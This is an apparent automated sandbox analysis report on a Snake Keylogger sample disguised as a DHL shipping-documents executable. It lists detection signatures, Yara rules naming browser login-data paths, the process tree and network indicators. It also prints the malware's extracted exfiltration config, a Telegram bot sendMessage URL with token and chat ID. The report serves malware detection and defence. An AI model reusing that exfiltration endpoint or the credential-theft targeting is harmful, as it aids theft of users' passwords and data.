Windows Analysis Report
DHL AWB SHIPPING DOCS_AWB_0009123.exe

Overview

General Information

Sample Name:DHL AWB SHIPPING DOCS_AWB_0009123.exe
Analysis ID:800700
MD5:cf98f42b9d4bbdc20e54e7e0ca7543c0
SHA1:2543080386230d110b18e1b653c14d1d640998da
SHA256:f7b57c7265e87bee11e652eba90afe3e0c34f691cd8faf3b79fe8def96044831
Tags:DHL, exe, SnakeKeylogger

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
May check the online IP address of the machine
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Yara detected Generic Downloader
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • DHL AWB SHIPPING DOCS_AWB_0009123.exe (PID: 1772 cmdline: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe MD5: CF98F42B9D4BBDC20E54E7E0CA7543C0)
    • tdbwdaltxz.exe (PID: 5884 cmdline: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m MD5: 377552A9A2C84B8C55314176A566C079)
      • tdbwdaltxz.exe (PID: 5864 cmdline: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe MD5: 377552A9A2C84B8C55314176A566C079)
      • MpCmdRun.exe (PID: 2576 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
        • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6155153237:AAHwniNOLh5IeMqe3WWu52NIjrXAphPX4U4/sendMessage?chat_id=5463149861"}
Source | Rule | Description | Author | Strings
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth (Nextron Systems)
  • 0x2ecb8:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x2deea:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x2e31d:$a4: \Orbitum\User Data\Default\Login Data
  • 0x2f444:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
  • 0x28192:$s1: UnHook
  • 0x28199:$s2: SetHook
  • 0x281a1:$s3: CallNextHook
  • 0x281ae:$s4: _hook
Source | Rule | Description | Author | Strings
2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth (Nextron Systems)
  • 0x1b660:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1a892:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1acc5:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1bdec:$a5: \Kometa\User Data\Default\Login Data
2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
                No Sigma rule has matched
                Timestamp:02/07/23-18:24:17.350492
                Source IP:192.168.2.3
                Destination IP:193.122.6.168
                SID:2039190
                Source Port:49700
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                AV Detection

                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exe, ReversingLabs: Detection: 43%
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exe, Virustotal: Detection: 37%
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe, ReversingLabs: Detection: 23%
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe, Virustotal: Detection: 12%
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, Avira: Label: TR/ATRAPS.Gen
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6155153237:AAHwniNOLh5IeMqe3WWu52NIjrXAphPX4U4/sendMessage?chat_id=5463149861"}
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: wntdll.pdbUGP source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 0105F851h2_2_0105F321
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01058597h2_2_010582D8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010589F7h2_2_01058738
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01057CD7h2_2_0105792F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 0105FCA9h2_2_0105F9F0
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01058E57h2_2_01058B99
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01056D19h2_2_01056A59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010568A2h2_2_01055DB7
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01058137h2_2_01057E78
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010572E0h2_2_01056EC8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010572E0h2_2_0105720E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_010552D8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0105590B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_01055AEC
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010572E0h2_2_01056EB9

                Networking

                Source: Traffic, Snort IDS: 2039190 ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.3:49700 -> 193.122.6.168:80
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe, DNS query: name: checkip.dyndns.org
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Joe Sandbox View, ASN Name: ORACLE-BMC-31898US
                Source: Joe Sandbox View, IP Address: 193.122.6.168
                Source: global traffic, HTTP traffic detected:
                    GET / HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                    Host: checkip.dyndns.org
                    Connection: Keep-Alive
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: tdbwdaltxz.exe, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: tdbwdaltxz.exe, 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org4
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: tdbwdaltxz.exeString found in binary or memory: http://schemas.m
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: tdbwdaltxz.exe, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

                System Summary

                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
